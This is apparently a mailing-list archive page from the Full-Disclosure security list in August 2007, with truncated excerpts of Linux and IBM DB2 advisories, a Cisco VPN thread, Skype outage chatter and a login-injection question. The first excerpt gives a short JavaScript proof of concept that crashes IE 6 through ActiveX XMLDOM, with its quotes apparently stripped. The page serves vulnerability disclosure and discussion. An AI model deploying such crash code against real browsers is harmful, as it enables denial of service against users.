This bit of JavaScript kills IE 6 on Windows 2000 and Windows XP SP2
var xmlDoc = new ActiveXObject(Microsoft.XMLDOM);
xmlDoc.loadXML(dummy/dummy);
var txt = xmlDoc.createTextNode(huh);
var out = txt.substringData(1,0x7fff);
Installing the patch from MS07-042 fixes it.
Hey all,
For anyone that's interested I've just posted another paper entitled Oracle
Forensics Part 6: Examining Undo Segments, Flashback and the Oracle Recycle
Bin. You can get this and other papers on Oracle forensics from
http://www.databasesecurity.com/oracle-forensics.htm
Cheers,
David
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Foresight Linux Essential Advisory: 2007-0046-1
Published: 2007-08-14
Rating: Major
Updated Versions:
cups=/[EMAIL PROTECTED]:devel//[EMAIL PROTECTED]:1-devel//1/1.2.12-0.2-1
group-dist=/[EMAIL PROTECTED]:1-devel//1/1.3.2-0.8-2
References:
Dear Joey Mengele,
Of cause, it's mitigating factor. But:
default PATH_MAX under Linux is 4096, and it's not hard to create
file/folder with longer path, it's impossible to access it,
E.g. folder with path longer than PATH_MAX:
bash$ pwd
pwd: could not get current directory:
Create your own method to except the password
On 8/15/07, d e f c o n [EMAIL PROTECTED] wrote:
I am getting an error on my website when I input `--1--` as login and
password, how do I patch this and what does this mean? Could I get hacked?
Or is this nothing to worrie about?
defcon
Hey All!
So, as an exercise just for giggles, I attempted to get a fix for this.
Reference:
http://www.cisco.com/warp/public/707/cisco-sa-20070815-vpnclient.shtml
As we are just a shop, we do not have a Cisco contract. Here's where the
fun starts. From the above:
1.
Customers who purchase
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200708-10
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - -
James Lay wrote:
You'll need a LOT more then just the site and serial number...you'll need to
be registered with Cisco or provide them with:
REQUIRED INFORMATION
* CONTACT NAME:
* CONTACT PHONE NUMBER:
* CONTACT CISCO.COM USERID (if one exists):
* CONTACT EMAIL ADDRESS:
* CONTRACT #:
On Thu, 16 Aug 2007 13:05:58 MDT, Joshua Russel said:
The Technet Security and MSDN websites are extremely slow from the
last couple of days. Are they under DDoS?
Probably the self-inflicted one known as Patch Tuesday.
This month's was pretty humongous. Freaked some ISPs out:
Maybe it's an update?
On 8/16/07, Joshua Russel [EMAIL PROTECTED] wrote:
The Technet Security and MSDN websites are extremely slow from the
last couple of days. Are they under DDoS?
___
Full-Disclosure - We believe in it.
Charter:
I went to the below URL you referenced
(http://www.cisco.com/cgi-bin/tablebuild.pl/windows?psrtdcat20e2), logged
in, and it works fine for me with a listing of all the clients to
download.
vpnclient-win-msi-5.0.01.0600-k9.exe
VPN Client Software for 2000/XP/Vista - Microsoft Installer
The Technet Security and MSDN websites are extremely slow from the
last couple of days. Are they under DDoS?
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia -
Greetings,
Does anyone know any more details about the current skype outage, other
than what is being presented on their web-site? It appears that all
skype-in telephone numbers are reporting out of service, their
downloads are disabled, and login to the service is disabled.
Thanks in
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200708-11
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - -
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200708-12
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - -
Yeah. Skype is Out Of Service.
--
Yours,
J.A. Terranson
sysadmin_at_mfn.org
0xBD4A95BF
Military force is justified only in self-defense; naked aggression is the
province of dictators and rogue states. This is the danger of a new
'pre-emptive first strike' doctrine.
Ron Paul
On Thu, 16
Hello Simon
Simon Smith wrote:
Greetings,
Does anyone know any more details about the current skype outage, other
than what is being presented on their web-site? It appears that all
I guess Problems with Skype login [1] does tell a little bit more.
[1]
Frankly i now feel, that its not SecNiche's fault entirely, it has got a
lot of encouragement from its past invalid and absurd claims.
Such as
_JWIG Context Dependent Template Calling Denial of Service Vulnerability._
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-3816
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
IBM DB2 Universal Database Multiple Race Condition Vulnerabilities
iDefense Security Advisory 08.16.07
http://labs.idefense.com/intelligence/vulnerabilities/
Aug 16, 2007
I. BACKGROUND
IBM Corp.'s DB2 Universal Database product is a large database server
product commonly used for high end
IBM DB2 Universal Database Directory Traversal Vulnerability
iDefense Security Advisory 08.16.07
http://labs.idefense.com/intelligence/vulnerabilities/
Aug 16, 2007
I. BACKGROUND
IBM Corp.'s DB2 Universal Database product is a large database server
product commonly used for high end databases.
IBM DB2 Universal Database Multiple File Creation Vulnerabilities
iDefense Security Advisory 08.16.07
http://labs.idefense.com/intelligence/vulnerabilities/
Aug 16, 2007
I. BACKGROUND
IBM Corp.'s DB2 Universal Database product is a large database server
product commonly used for high end
IBM DB2 Universal Database Directory Creation Vulnerability
iDefense Security Advisory 08.16.07
http://labs.idefense.com/intelligence/vulnerabilities/
Aug 16, 2007
I. BACKGROUND
IBM Corp.'s DB2 Universal Database product is a large database server
product commonly used for high end databases.
IBM DB2 Universal Database Multiple Untrusted Search Path Vulnerabilities
iDefense Security Advisory 08.16.07
http://labs.idefense.com/intelligence/vulnerabilities/
Aug 16, 2007
I. BACKGROUND
IBM Corp.'s DB2 Universal Database product is a large database server
product commonly used for high
IBM DB2 Universal Database buildDasPaths Buffer Overflow Vulnerability
iDefense Security Advisory 08.16.07
http://labs.idefense.com/intelligence/vulnerabilities/
Aug 16, 2007
I. BACKGROUND
IBM Corp.'s DB2 Universal Database product is a large database server
product commonly used for high end
Hrmm I am wondering if several people are toying with me or if
something is really going on over in Xbox Live support?
Well Slavik Plotnikov after posting my information at http://
www.digitalmunition.com/StolenUpdate.html and speaking with the media
Scott Hirnle ultimately took
care of
===
Ubuntu Security Notice USN-499-1August 16, 2007
apache2 vulnerabilities
CVE-2006-5752, CVE-2007-1863, CVE-2007-3304
===
A security issue affects the following Ubuntu
27 matches
Mail list logo
